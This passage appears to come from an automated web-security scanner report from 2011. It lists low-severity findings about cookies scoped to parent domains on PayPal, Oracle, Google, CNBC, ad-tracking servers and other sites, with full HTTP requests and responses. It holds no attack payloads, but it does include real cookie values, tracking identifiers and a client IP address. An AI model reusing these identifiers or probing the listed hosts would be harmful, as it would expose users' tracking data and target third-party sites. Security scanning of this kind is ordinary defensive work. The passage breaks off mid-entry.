The following cookie was issued by the application and is scoped to a parent of the issuing domain:is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323346.0; expires=Sun, 04-Sep-2016 15:35:46 GMT; path=/; domain=.statcounter.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t.php?sc_project=3776433&resolution=1920&h=1200&camefrom=&u=http%3A//www.resourcepoint.net/&t=Resource%20Point%20%E2%80%93%20Experts%20in%20eCommerce%2C%20portal%20development%20%26%20content%20management&java=1&security=f2e27155&sc_random=0.36302077560685575&sc_snum=1&invisible=1 HTTP/1.1 Host: c.statcounter.com Proxy-Connection: keep-alive Referer: http://www.resourcepoint.net/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:35:46 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR" Expires: Mon, 26 Jul 1997 05:00:00 GMTSet-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323346.0; expires=Sun, 04-Sep-2016 15:35:46 GMT; path=/; domain=.statcounter.com Content-Length: 49 Connection: close Content-Type: image/gif GIF89a...................!.......,...........T..;
12.15. http://clk.fetchback.com/serve/fb/click
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://clk.fetchback.com
Path:
/serve/fb/click
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ cre=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ clk=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serve/fb/click HTTP/1.1 Host: clk.fetchback.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:22 GMT Server: Apache/2.2.3 (CentOS)Set-Cookie: uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: cre=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: clk=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Tue, 06 Sep 2011 17:06:22 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 2
12.16. http://clk.fetchback.com/serve/fb/engmnt
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://clk.fetchback.com
Path:
/serve/fb/engmnt
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ eng=1_1315328782_20056:1658183; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serve/fb/engmnt HTTP/1.1 Host: clk.fetchback.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:22 GMT Server: Apache/2.2.3 (CentOS)Set-Cookie: uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: eng=1_1315328782_20056:1658183; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Tue, 06 Sep 2011 17:06:22 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 2
12.17. https://cms.paypal.com/us/cgi-bin/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cms.paypal.com
Path:
/us/cgi-bin/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/cgi-bin/ HTTP/1.1 Host: cms.paypal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Frame-Options: SAMEORIGIN Content-Type: text/html; charset=UTF-8 Expires: Tue, 06 Sep 2011 17:06:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 17:06:24 GMT Content-Length: 24992 Connection: closeSet-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: navlns=0.0; expires=Mon, 01-Sep-2031 17:06:24 GMT; domain=.paypal.com; path=/; Secure; HttpOnly <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head> <meta http-equiv="Conte...[SNIP]...
12.18. http://developers.facebook.com/plugins/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://developers.facebook.com
Path:
/plugins/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plugins/ HTTP/1.1 Host: developers.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: /docs/plugins P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache X-UA-Compatible: IE=edge X-XSS-Protection: 0Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 X-FB-Server: 10.136.195.105 Connection: close Date: Tue, 06 Sep 2011 17:06:31 GMT Content-Length: 0
12.19. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://education.oracle.com
Path:
/cgi-bin/shopcart/viewcart.cgi
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:shopCartId=6496530; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/shopcart/viewcart.cgi HTTP/1.1 Host: education.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: shopCartId=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: source=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: org_id=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: lang=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: territoryCode=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: territoryCode=US; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/ Set-Cookie: lang=US; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/ Set-Cookie: org_id=1001; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/ Set-Cookie: shopCartId=6496530; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/ Set-Cookie: source=OU; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/ Connection: Close Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057819944031981,1) Date: Tue, 06 Sep 2011 15:59:33 GMT Content-Length: 5316 <html> <head> <title>Oracle University: Empty Shopping Cart</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <SCRIPT LANGUAGE="JavaScript"> var orgid = 1001; var lan...[SNIP]...
12.20. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://education.oracle.com
Path:
/pls/web_prod-plq-dad/db_pages.getpage
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:p_mcc=WWOCOMINTMAINPAGEBNR; domain=.oracle.com; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pls/web_prod-plq-dad/db_pages.getpage?page_id=402&p_nl=ORSL&intcmp=WWOCOMINTMAINPAGEBNR HTTP/1.1 Host: education.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Length: 6859 Content-Type: text/html; charset=UTF-8Set-Cookie: p_mcc=WWOCOMINTMAINPAGEBNR; domain=.oracle.com; path=/ Set-Cookie: p_org_id=1001; domain=.oracle.com; path=/ Set-Cookie: p_lang=US; domain=.oracle.com; path=/ Set-Cookie: p_cur_URL=0; domain=.oracle.com; path=/ Connection: Close Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057867188663244,0) Date: Tue, 06 Sep 2011 15:59:24 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <me...[SNIP]...
12.21. http://id.google.com/verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://id.google.com
Path:
/verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:NID=50=SvhSQwwc_f05ytceKz3t_muBbRrFYuwb4q2aMa6_eczHxS7UwVoND78j00dvnenEHEPde95OEOC0FEEsn_DBzr_g2116E6t-KYynBReKkeRqJkxn8r7XlTtVkBWfyFJ5; expires=Wed, 07-Mar-2012 16:45:17 GMT; path=/; domain=.google.com; HttpOnly The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif HTTP/1.1 Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SNID=50=bVxkgLcqEicQGWCwjN0J7lK28lXRF1qOuXMwopVHzA=1szWgyw5SFrHzZqV; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX
Response
HTTP/1.1 200 OKSet-Cookie: NID=50=SvhSQwwc_f05ytceKz3t_muBbRrFYuwb4q2aMa6_eczHxS7UwVoND78j00dvnenEHEPde95OEOC0FEEsn_DBzr_g2116E6t-KYynBReKkeRqJkxn8r7XlTtVkBWfyFJ5; expires=Wed, 07-Mar-2012 16:45:17 GMT; path=/; domain=.google.com; HttpOnly Cache-Control: no-cache, private, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Type: image/gif Date: Tue, 06 Sep 2011 16:45:17 GMT Server: zwbk Content-Length: 43 X-XSS-Protection: 1; mode=block GIF89a.............!.......,...........D..;
12.22. http://imp.fetchback.com/serve/fb/adtag.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://imp.fetchback.com
Path:
/serve/fb/adtag.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /serve/fb/adtag.js?tid=11792&type=mrect HTTP/1.1 Host: imp.fetchback.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:16 GMT Server: Apache/2.2.3 (CentOS)Set-Cookie: uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Tue, 06 Sep 2011 15:00:16 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 204 document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrect' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+"><"+"/iframe"+">"...[SNIP]...
12.23. http://imp.fetchback.com/serve/fb/imp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://imp.fetchback.com
Path:
/serve/fb/imp
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:cre=1_1315321216_20056:11790:1:1650753:1650753_20054:11791:1:1896427:1896427; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ kwd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ scg=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ ppd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ act=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serve/fb/imp?tid=11792&type=mrect HTTP/1.1 Host: imp.fetchback.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1315321216_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:16 GMT Server: Apache/2.2.3 (CentOS)Set-Cookie: cre=1_1315321216_20056:11790:1:1650753:1650753_20054:11791:1:1896427:1896427; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Set-Cookie: uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Set-Cookie: kwd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Set-Cookie: scg=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Set-Cookie: ppd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Set-Cookie: act=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Tue, 06 Sep 2011 15:00:16 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 5114 <style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css"> /* TODO customize this sample style Syntax recommendation http://www.w3.org/TR/REC-CSS2/ */ button.fb-fi...[SNIP]...
12.24. https://login.cnbc.com/cas/logout
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/logout
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cas/logout HTTP/1.1 Host: login.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:04:31 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19Set-Cookie: CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/ Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: SUBSCRIBERINFO=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: SUBSCRIBERINFO2=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: SUBSCRIBERINFO3=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_ws=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: snas=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_ipb_member_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_ipb_session_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_ipb_pass_hash=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_sna=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: c_enc=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Location: http://www.cnbc.com Content-Language: en Content-Length: 0 Connection: close Content-Type: text/html;charset=ISO-8859-1
12.25. http://m1215.ic-live.com/522/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://m1215.ic-live.com
Path:
/522/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:44 GMT; Path=/ pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:44 GMT; Path=/ sid1215=1315327545U3aHt51RXPi099; Domain=.ic-live.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /522/?33083100&OVMTC=Broad&site=&creative=6492920360&OVKEY=beauty%20products&url_id=33083100 HTTP/1.1 Host: m1215.ic-live.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ngx_userid=50.23.123.106:1315327539133; pid2=1315301244rR4cN0jX2yM1; sid1460=1315327539qIJ0arLZTDmI99; cvt586=106159628; ngx_106159628=2011-09-06:09:45:39
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1Set-Cookie: ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:44 GMT; Path=/ Set-Cookie: pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:44 GMT; Path=/ Set-Cookie: sid1215=1315327545U3aHt51RXPi099; Domain=.ic-live.com; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT" Location: http://www.marykay.com/?pid=mk Date: Tue, 06 Sep 2011 16:45:44 GMT Set-Cookie: Coyote-2-a210828=a210872:0; path=/ Content-Length: 0
12.26. http://m1460.ic-live.com/586/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://m1460.ic-live.com
Path:
/586/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:40 GMT; Path=/ pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:40 GMT; Path=/ sid1460=1315327540EFWgV8Bzct0q99; Domain=.ic-live.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /586/?106159628&OVMTC=Phrase&site=&creative=9131745784&OVKEY=beauty%20product&url_id=106159628 HTTP/1.1 Host: m1460.ic-live.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pid2=1315301244rR4cN0jX2yM1
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1Set-Cookie: ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:40 GMT; Path=/ Set-Cookie: pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:40 GMT; Path=/ Set-Cookie: sid1460=1315327540EFWgV8Bzct0q99; Domain=.ic-live.com; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT" Location: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google Date: Tue, 06 Sep 2011 16:45:40 GMT Set-Cookie: Coyote-2-a210828=a210874:0; path=/ Content-Length: 0
12.27. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oasc12059.247realmedia.com
Path:
/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:RMFD=011R0ynx; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1 HTTP/1.1 Host: oasc12059.247realmedia.com Proxy-Connection: keep-alive Referer: http://www.cvs.com/CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:47:21 GMT Server: Apache/2.2.3 (Red Hat)Set-Cookie: RMFD=011R0ynx; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 807 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/;httponly document.write ('<script language="JavaScript" type="text/javascript" src="https://view.atdmt.com/DEN/jview/328347987/direct/01/823358824?click=http://oasc12059.247realmedia.com/RealMedia/ads/click_lx...[SNIP]...
12.28. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/a/6451/11953/20435-15.js
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=60; path=/; domain=.rubiconproject.com ses15=9844^2&11953^4; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61374; path=/; domain=.rubiconproject.com csi15=2553663.js^1^1315321025^1315321025&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:57:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com; The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
